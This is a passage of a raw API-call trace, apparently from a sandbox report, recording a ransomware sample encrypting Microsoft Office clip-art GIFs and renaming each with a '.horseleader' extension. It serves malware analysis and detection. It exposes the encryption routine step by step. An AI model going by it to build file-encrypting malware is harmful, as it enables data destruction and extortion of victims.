dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.315] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF") returned 67 [0252.315] StrStrW (lpFirst="AG00037_.GIF", lpSrch=".txt") returned 0x0 [0252.315] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=6684) returned 1 [0252.315] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1a1c, lpOverlapped=0x0) returned 1 [0252.318] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe5e4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.318] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1a1c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1a1c, lpOverlapped=0x0) returned 1 [0252.318] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.318] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.319] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.319] CloseHandle (hObject=0x158) returned 1 [0252.319] GetProcessHeap () returned 0x780000 [0252.319] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.319] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF.horseleader") returned 79 [0252.319] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00037_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00037_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00037_.gif.horseleader")) returned 1 [0252.320] GetProcessHeap () returned 0x780000 [0252.320] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.320] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47589c00, ftCreationTime.dwHighDateTime=0x1bf325d, ftLastAccessTime.dwLowDateTime=0x512f1610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x47589c00, ftLastWriteTime.dwHighDateTime=0x1bf325d, nFileSizeHigh=0x0, nFileSizeLow=0xcb3, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00038_.GIF", cAlternateFileName="")) returned 1 [0252.320] lstrcmpiW (lpString1="AG00038_.GIF", lpString2="Windows") returned -1 [0252.320] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 67 [0252.320] StrStrIW (lpFirst="AG00038_.GIF", lpSrch=".horseleader") returned 0x0 [0252.320] lstrcmpW (lpString1="AG00038_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.321] lstrcmpW (lpString1="AG00038_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.321] lstrlenW (lpString=".testttjffg") returned 11 [0252.321] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.321] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.321] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.321] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00038_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.322] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 67 [0252.322] StrStrW (lpFirst="AG00038_.GIF", lpSrch=".txt") returned 0x0 [0252.322] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3251) returned 1 [0252.323] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xcb3, lpOverlapped=0x0) returned 1 [0252.341] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff34d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.341] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xcb3, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xcb3, lpOverlapped=0x0) returned 1 [0252.342] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.342] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.342] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.342] CloseHandle (hObject=0x158) returned 1 [0252.346] GetProcessHeap () returned 0x780000 [0252.346] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.346] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF.horseleader") returned 79 [0252.346] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00038_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00038_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00038_.gif.horseleader")) returned 1 [0252.348] GetProcessHeap () returned 0x780000 [0252.348] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.348] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f4fc100, ftCreationTime.dwHighDateTime=0x1bd4b49, ftLastAccessTime.dwLowDateTime=0x5eb42550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f4fc100, ftLastWriteTime.dwHighDateTime=0x1bd4b49, nFileSizeHigh=0x0, nFileSizeLow=0x1fa1, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00040_.GIF", cAlternateFileName="")) returned 1 [0252.348] lstrcmpiW (lpString1="AG00040_.GIF", lpString2="Windows") returned -1 [0252.348] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 67 [0252.348] StrStrIW (lpFirst="AG00040_.GIF", lpSrch=".horseleader") returned 0x0 [0252.349] lstrcmpW (lpString1="AG00040_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.349] lstrcmpW (lpString1="AG00040_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.349] lstrlenW (lpString=".testttjffg") returned 11 [0252.349] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.349] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.349] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.349] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00040_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.350] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 67 [0252.350] StrStrW (lpFirst="AG00040_.GIF", lpSrch=".txt") returned 0x0 [0252.350] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=8097) returned 1 [0252.350] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1fa1, lpOverlapped=0x0) returned 1 [0252.367] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe05f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.367] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1fa1, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1fa1, lpOverlapped=0x0) returned 1 [0252.368] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.368] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.368] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.368] CloseHandle (hObject=0x158) returned 1 [0252.368] GetProcessHeap () returned 0x780000 [0252.368] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.369] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF.horseleader") returned 79 [0252.369] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00040_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00040_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00040_.gif.horseleader")) returned 1 [0252.370] GetProcessHeap () returned 0x780000 [0252.370] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.370] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x262e5400, ftCreationTime.dwHighDateTime=0x1bd4c10, ftLastAccessTime.dwLowDateTime=0x512f1610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x262e5400, ftLastWriteTime.dwHighDateTime=0x1bd4c10, nFileSizeHigh=0x0, nFileSizeLow=0x1e06, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00052_.GIF", cAlternateFileName="")) returned 1 [0252.370] lstrcmpiW (lpString1="AG00052_.GIF", lpString2="Windows") returned -1 [0252.370] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 67 [0252.370] StrStrIW (lpFirst="AG00052_.GIF", lpSrch=".horseleader") returned 0x0 [0252.370] lstrcmpW (lpString1="AG00052_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.370] lstrcmpW (lpString1="AG00052_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.370] lstrlenW (lpString=".testttjffg") returned 11 [0252.370] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.371] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.371] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.371] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00052_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.371] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 67 [0252.372] StrStrW (lpFirst="AG00052_.GIF", lpSrch=".txt") returned 0x0 [0252.372] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=7686) returned 1 [0252.372] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1e06, lpOverlapped=0x0) returned 1 [0252.379] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe1fa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.379] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1e06, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1e06, lpOverlapped=0x0) returned 1 [0252.379] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.379] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.379] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.380] CloseHandle (hObject=0x158) returned 1 [0252.380] GetProcessHeap () returned 0x780000 [0252.380] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.380] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF.horseleader") returned 79 [0252.380] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00052_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00052_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00052_.gif.horseleader")) returned 1 [0252.381] GetProcessHeap () returned 0x780000 [0252.381] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.381] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b6b4200, ftCreationTime.dwHighDateTime=0x1bd4b49, ftLastAccessTime.dwLowDateTime=0x512f1610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8b6b4200, ftLastWriteTime.dwHighDateTime=0x1bd4b49, nFileSizeHigh=0x0, nFileSizeLow=0x2e73, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00057_.GIF", cAlternateFileName="")) returned 1 [0252.381] lstrcmpiW (lpString1="AG00057_.GIF", lpString2="Windows") returned -1 [0252.381] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 67 [0252.382] StrStrIW (lpFirst="AG00057_.GIF", lpSrch=".horseleader") returned 0x0 [0252.382] lstrcmpW (lpString1="AG00057_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.382] lstrcmpW (lpString1="AG00057_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.382] lstrlenW (lpString=".testttjffg") returned 11 [0252.382] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.382] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.382] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.382] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00057_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.383] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 67 [0252.383] StrStrW (lpFirst="AG00057_.GIF", lpSrch=".txt") returned 0x0 [0252.383] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=11891) returned 1 [0252.383] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2e73, lpOverlapped=0x0) returned 1 [0252.386] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd18d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.386] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2e73, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2e73, lpOverlapped=0x0) returned 1 [0252.387] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.387] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.400] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.400] CloseHandle (hObject=0x158) returned 1 [0252.400] GetProcessHeap () returned 0x780000 [0252.400] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.400] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF.horseleader") returned 79 [0252.400] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00057_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00057_.gif.horseleader")) returned 1 [0252.401] GetProcessHeap () returned 0x780000 [0252.401] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.402] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29618e00, ftCreationTime.dwHighDateTime=0x1bd50af, ftLastAccessTime.dwLowDateTime=0x5eb42550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x29618e00, ftLastWriteTime.dwHighDateTime=0x1bd50af, nFileSizeHigh=0x0, nFileSizeLow=0x205, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00090_.GIF", cAlternateFileName="")) returned 1 [0252.402] lstrcmpiW (lpString1="AG00090_.GIF", lpString2="Windows") returned -1 [0252.402] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 67 [0252.402] StrStrIW (lpFirst="AG00090_.GIF", lpSrch=".horseleader") returned 0x0 [0252.402] lstrcmpW (lpString1="AG00090_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.402] lstrcmpW (lpString1="AG00090_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.402] lstrlenW (lpString=".testttjffg") returned 11 [0252.402] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.402] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.402] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.402] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00090_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.403] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 67 [0252.403] StrStrW (lpFirst="AG00090_.GIF", lpSrch=".txt") returned 0x0 [0252.403] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=517) returned 1 [0252.404] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x205, lpOverlapped=0x0) returned 1 [0252.405] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffdfb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.405] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x205, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x205, lpOverlapped=0x0) returned 1 [0252.406] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.406] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.406] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.406] CloseHandle (hObject=0x158) returned 1 [0252.406] GetProcessHeap () returned 0x780000 [0252.406] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.406] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF.horseleader") returned 79 [0252.407] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00090_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00090_.gif.horseleader")) returned 1 [0252.412] GetProcessHeap () returned 0x780000 [0252.412] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.412] 